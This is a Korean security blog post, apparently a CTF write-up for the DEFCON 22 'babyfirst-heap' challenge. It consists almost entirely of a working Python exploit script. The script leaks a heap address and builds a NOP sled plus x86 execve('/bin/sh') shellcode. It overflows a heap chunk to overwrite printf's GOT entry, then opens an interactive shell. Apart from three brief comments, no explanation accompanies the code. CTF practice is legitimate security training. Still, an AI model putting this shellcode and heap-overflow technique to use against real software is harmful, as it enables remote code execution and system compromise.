[exploit] DEFCON 22 babyfirst-heap writeups

# heap overflow 
# overwrite a chunk next heap  
# overwrite GOT  
#!/usr/bin/env python 
import struct, telnetlib 
from socket 
import *  

p = lambda x:   struct.pack("<I", x)  
host = 'localhost' 
port = 3313 
s = socket(AF_INET, SOCK_STREAM) 
s.connect((host, port))  

addr = '' 
while( addr.find("][size=260]") == -1):
     addr = s.recv(512)
    tmp = ''
while( tmp.find("Write") == -1):
    tmp = s.recv(1024)  

print "## get the heap address ##" 
addr = addr.split("[ALLOC][loc=")[1].split("][size=260]")[0]  

if( len(addr) == 7 ):   
    addr = "0" + addr 

tmp = '' 
for i in range(6, -2, -2):     
    tmp += addr[i:i+2].decode('hex')   

shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" 
shellcode += "\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00" 
shellcode += "\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd" 
shellcode += "\x80" 

addr = struct.unpack("<L", tmp)[0] 
printf_got = 0x804c004  

#[nop][shellcode][heap_size][next_chunk][prev] 
payload = '\x90'*(260-len(shellcode)) 
payload += shellcode 
payload += p(0x36d) 
payload += p(addr)        # next 
payload += p(printf_got - 4)      # prev 
print "## send payload ##" 
s.send(payload) 

print "## get the shell ##"  
t = telnetlib.Telnet() 
t.sock = s 
t.interact()  
s.close()

저작자표시

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[exploit] 2013 SECUINSIDE reader writeups (0)	2014.11.17
[algorithm] DEFCON 22th 3dttt writeups (0)	2014.05.22
[REVERSING] backdoor2014 bin10, 100 writeup (0)	2014.03.24
[CRYPTO] backdoor2014 crypto10, 200-2 writeup (0)	2014.03.24
[NETWORK] backdoor2014 MISC250 writeup (0)	2014.03.24

Hello, Stranger

[exploit] DEFCON 22 babyfirst-heap writeups

'Security > [게임] CTF 풀이' 카테고리의 다른 글

티스토리툴바

[exploit] DEFCON 22 babyfirst-heap writeups

'Security > [게임] CTF 풀이' 카테고리의 다른 글

관련글

티스토리툴바